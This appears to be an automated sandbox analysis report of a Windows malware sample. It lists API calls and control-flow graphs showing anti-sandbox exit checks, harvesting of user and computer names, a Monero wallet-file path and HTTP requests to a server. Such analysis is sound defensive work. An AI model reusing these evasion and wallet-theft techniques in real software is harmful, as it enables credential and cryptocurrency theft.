                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                              • Part of subcall function 00F45440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F45478
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F45510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F45568
                              • Part of subcall function 00F45510: lstrlen.KERNEL32(00000000), ref: 00F4557F
                              • Part of subcall function 00F45510: StrStrA.SHLWAPI(00000000,00000000), ref: 00F455B4
                              • Part of subcall function 00F45510: lstrlen.KERNEL32(00000000), ref: 00F455D3
                              • Part of subcall function 00F45510: lstrlen.KERNEL32(00000000), ref: 00F455FE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F459DB
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F45B90
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F45C5C
                            • Sleep.KERNEL32(0000EA60), ref: 00F45C6B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 507064821-2791005934
                            • Opcode ID: 554c31cd7ec997614c11ce0a296f8d339a9d74ba2b2303ec222a40b72e4e45b3
                            • Instruction ID: 02661dc1c2956947e7e155d49a6e4f1d8da81ac655b558eb9984d5d3a0baeb6c
                            • Opcode Fuzzy Hash: 554c31cd7ec997614c11ce0a296f8d339a9d74ba2b2303ec222a40b72e4e45b3
                            • Instruction Fuzzy Hash: 49E173729505049BDB14FBA0ED67EED7B3DBF94300F408658B90656096EF38AB08EB52

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1301 f419f0-f41a1d call f4ade0 StrCmpCA 1304 f41a27-f41a41 call f4ade0 1301->1304 1305 f41a1f-f41a21 ExitProcess 1301->1305 1309 f41a44-f41a48 1304->1309 1310 f41c12-f41c1d call f4ab10 1309->1310 1311 f41a4e-f41a61 1309->1311 1313 f41a67-f41a6a 1311->1313 1314 f41bee-f41c0d 1311->1314 1316 f41a71-f41a80 call f4ab30 1313->1316 1317 f41afd-f41b0e StrCmpCA 1313->1317 1318 f41b1f-f41b30 StrCmpCA 1313->1318 1319 f41bdf-f41be9 call f4ab30 1313->1319 1320 f41a99-f41aa8 call f4ab30 1313->1320 1321 f41a85-f41a94 call f4ab30 1313->1321 1322 f41bc0-f41bd1 StrCmpCA 1313->1322 1323 f41b41-f41b52 StrCmpCA 1313->1323 1324 f41ba1-f41bb2 StrCmpCA 1313->1324 1325 f41b82-f41b93 StrCmpCA 1313->1325 1326 f41b63-f41b74 StrCmpCA 1313->1326 1327 f41aad-f41abe StrCmpCA 1313->1327 1328 f41acf-f41ae0 StrCmpCA 1313->1328 1314->1309 1316->1314 1334 f41b10-f41b13 1317->1334 1335 f41b1a 1317->1335 1336 f41b32-f41b35 1318->1336 1337 f41b3c 1318->1337 1319->1314 1320->1314 1321->1314 1347 f41bd3-f41bd6 1322->1347 1348 f41bdd 1322->1348 1338 f41b54-f41b57 1323->1338 1339 f41b5e 1323->1339 1344 f41bb4-f41bb7 1324->1344 1345 f41bbe 1324->1345 1342 f41b95-f41b98 1325->1342 1343 f41b9f 1325->1343 1340 f41b76-f41b79 1326->1340 1341 f41b80 1326->1341 1330 f41ac0-f41ac3 1327->1330 1331 f41aca 1327->1331 1332 f41ae2-f41aec 1328->1332 1333 f41aee-f41af1 1328->1333 1330->1331 1331->1314 1353 f41af8 1332->1353 1333->1353 1334->1335 1335->1314 1336->1337 1337->1314 1338->1339 1339->1314 1340->1341 1341->1314 1342->1343 1343->1314 1344->1345 1345->1314 1347->1348 1348->1314 1353->1314
                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 00F41A15
                            • ExitProcess.KERNEL32 ref: 00F41A21
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 1a48226173daf4551a2f81359dd04b3f8244d667811448e7f4cd9d1f08eb3cc9
                            • Instruction ID: 63aa06d99e1ed929ff200af6a1db04ea4f85914dac20f7e333a9a5a2183fee0a
                            • Opcode Fuzzy Hash: 1a48226173daf4551a2f81359dd04b3f8244d667811448e7f4cd9d1f08eb3cc9
                            • Instruction Fuzzy Hash: D8516F75B04209EFDB14DFA4D944BAE7BB9FF84304F104148ED02AB241EB74E985EB62

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,00980648), ref: 00F49BF1
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,009807F8), ref: 00F49C0A
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,009806D8), ref: 00F49C22
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,009806F0), ref: 00F49C3A
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,00980708), ref: 00F49C53
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,00988AF0), ref: 00F49C6B
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,00976700), ref: 00F49C83
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,00976A20), ref: 00F49C9C
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,00980738), ref: 00F49CB4
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,00980750), ref: 00F49CCC
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,00980768), ref: 00F49CE5
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,009807B0), ref: 00F49CFD
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,009766A0), ref: 00F49D15
                              • Part of subcall function 00F49BB0: GetProcAddress.KERNEL32(75900000,00980780), ref: 00F49D2E
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F311D0: ExitProcess.KERNEL32 ref: 00F31211
                              • Part of subcall function 00F31160: GetSystemInfo.KERNEL32(?), ref: 00F3116A
                              • Part of subcall function 00F31160: ExitProcess.KERNEL32 ref: 00F3117E
                              • Part of subcall function 00F31110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00F3112B
                              • Part of subcall function 00F31110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00F31132
                              • Part of subcall function 00F31110: ExitProcess.KERNEL32 ref: 00F31143
                              • Part of subcall function 00F31220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00F3123E
                              • Part of subcall function 00F31220: ExitProcess.KERNEL32 ref: 00F31294
                              • Part of subcall function 00F46A10: GetUserDefaultLangID.KERNEL32 ref: 00F46A14
                              • Part of subcall function 00F31190: ExitProcess.KERNEL32 ref: 00F311C6
                              • Part of subcall function 00F479E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F311B7), ref: 00F47A10
                              • Part of subcall function 00F479E0: RtlAllocateHeap.NTDLL(00000000), ref: 00F47A17
                              • Part of subcall function 00F479E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F47A2F
                              • Part of subcall function 00F47A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F47AA0
                              • Part of subcall function 00F47A70: RtlAllocateHeap.NTDLL(00000000), ref: 00F47AA7
                              • Part of subcall function 00F47A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00F47ABF
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00988A80,?,00F510F4,?,00000000,?,00F510F8,?,00000000,00F50AF3), ref: 00F46D6A
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F46D88
                            • CloseHandle.KERNEL32(00000000), ref: 00F46D99
                            • Sleep.KERNEL32(00001770), ref: 00F46DA4
                            • CloseHandle.KERNEL32(?,00000000,?,00988A80,?,00F510F4,?,00000000,?,00F510F8,?,00000000,00F50AF3), ref: 00F46DBA
                            • ExitProcess.KERNEL32 ref: 00F46DC2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2931873225-0
                            • Opcode ID: 14bd65fd043bf7d95d3d502f44948830c018be44919f7ffccb1f18cf32d4bff9
                            • Instruction ID: 5930d3bd57fe528b1f5d7d8947d437df1b92f9efb78ded7da69e5b46c0157935
                            • Opcode Fuzzy Hash: 14bd65fd043bf7d95d3d502f44948830c018be44919f7ffccb1f18cf32d4bff9
                            • Instruction Fuzzy Hash: 56310D71E44204ABEB15FBF0DC56BEE7B79BF44340F100918FA12A6182DF78A905E762

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1436 f46d93 1437 f46daa 1436->1437 1439 f46dac-f46dc2 call f46bc0 call f45d60 CloseHandle ExitProcess 1437->1439 1440 f46d5a-f46d77 call f4ade0 OpenEventA 1437->1440 1445 f46d95-f46da4 CloseHandle Sleep 1440->1445 1446 f46d79-f46d91 call f4ade0 CreateEventA 1440->1446 1445->1437 1446->1439
                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00988A80,?,00F510F4,?,00000000,?,00F510F8,?,00000000,00F50AF3), ref: 00F46D6A
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F46D88
                            • CloseHandle.KERNEL32(00000000), ref: 00F46D99
                            • Sleep.KERNEL32(00001770), ref: 00F46DA4
                            • CloseHandle.KERNEL32(?,00000000,?,00988A80,?,00F510F4,?,00000000,?,00F510F8,?,00000000,00F50AF3), ref: 00F46DBA
                            • ExitProcess.KERNEL32 ref: 00F46DC2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: fdca5f5651ca46a8d2037bbb599502b68cd33605126a209bce4cd36af928edff
                            • Instruction ID: 086ec2a94207cc31ac2fca6b2891bc69ca25f28bb9d891a40593d43dc2af7c9f
                            • Opcode Fuzzy Hash: fdca5f5651ca46a8d2037bbb599502b68cd33605126a209bce4cd36af928edff
                            • Instruction Fuzzy Hash: 4AF01270E44609AFEB11BBA0EC4ABBE7F74AF05711F100615BD12E51C6CBB46900EB56

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F34889
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00F34899
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: abf16be70164e70c3fba105b6173b86e8d9905cff52c88fe6c17e4c3550538b2
                            • Instruction ID: d767e8acdab1592d7f06e67294c6989ce50f224f1abf06c29c6e85ba7ca9eda4
                            • Opcode Fuzzy Hash: abf16be70164e70c3fba105b6173b86e8d9905cff52c88fe6c17e4c3550538b2
                            • Instruction Fuzzy Hash: C4216FB1D00208ABDF14DFA4EC4AADE7B75FB44320F108625F915A72C1EB706A09CF91

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                              • Part of subcall function 00F362D0: InternetOpenA.WININET(00F50DFF,00000001,00000000,00000000,00000000), ref: 00F36331
                              • Part of subcall function 00F362D0: StrCmpCA.SHLWAPI(?,0098E540), ref: 00F36353
                              • Part of subcall function 00F362D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F36385
                              • Part of subcall function 00F362D0: HttpOpenRequestA.WININET(00000000,GET,?,0098DA70,00000000,00000000,00400100,00000000), ref: 00F363D5
                              • Part of subcall function 00F362D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F3640F
                              • Part of subcall function 00F362D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F36421
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F45478
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: 183256b6519288ccebbb1fbdb40f4b0c13979b4203a97b93011e22cfca5b7c7d
                            • Instruction ID: 5f10bfba58ccdf67b4dc453ceb70c7793254b02b6a74e65615c368cacca4189e
                            • Opcode Fuzzy Hash: 183256b6519288ccebbb1fbdb40f4b0c13979b4203a97b93011e22cfca5b7c7d
                            • Instruction Fuzzy Hash: 31116531940008ABEB14FFA4DD92EED7B39AF50350F404558FD1A5B492EF38AB08EB52

                             Control-flow Graph

                             • Executed
                             • Not Executed
                             Nodes
                             • 1493: f31220-f31247, call f48b40, GlobalMemoryStatusEx
                             • 1496: f31273-f3127a
                             • 1497: f31249-f31271, call f4dd30 (x2)
                             • 1499: f31281-f31285
                             • 1501: f31287
                             • 1502: f3129a-f3129d
                             • 1504: f31292-f31294, ExitProcess
                             • 1505: f31289-f31290
                             Edges
                             • 1493 -> 1496, 1493 -> 1497
                             • 1496 -> 1499, 1497 -> 1499
                             • 1499 -> 1501, 1499 -> 1502
                             • 1501 -> 1504, 1501 -> 1505
                             • 1505 -> 1502, 1505 -> 1504
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00F3123E
                            • ExitProcess.KERNEL32 ref: 00F31294
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 803317263-2766056989
                            • Opcode ID: 0cb9320ee0a1a64e212606a0a9810d2dddba9267646820793001e5c4577814b8
                            • Instruction ID: 934d56740b3cbfd3a4431a186169768bc634e3faeefd8006dedf37722ccae73c
                            • Opcode Fuzzy Hash: 0cb9320ee0a1a64e212606a0a9810d2dddba9267646820793001e5c4577814b8
                            • Instruction Fuzzy Hash: F9011DB0D40308FAEB10EFE4DC4ABAEBB78BB14715F208548EA04B61C1D67895459759
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F47AA0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F47AA7
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 00F47ABF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 495c23b523d17b4c3d6112a56f91240325f1f0ce07eb9117d6373047e2c9c2d9
                            • Instruction ID: 515fedde3c71ef9428d2f8ab07d908de8e981ffd414d0d4daaff1fc58834790a
                            • Opcode Fuzzy Hash: 495c23b523d17b4c3d6112a56f91240325f1f0ce07eb9117d6373047e2c9c2d9
                            • Instruction Fuzzy Hash: F40186B1A08349AFC710DF98DD45BAEBBB8F704715F100219F945E3280D7745A0097A1
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00F3112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00F31132
                            • ExitProcess.KERNEL32 ref: 00F31143
                            Memory Dump Source
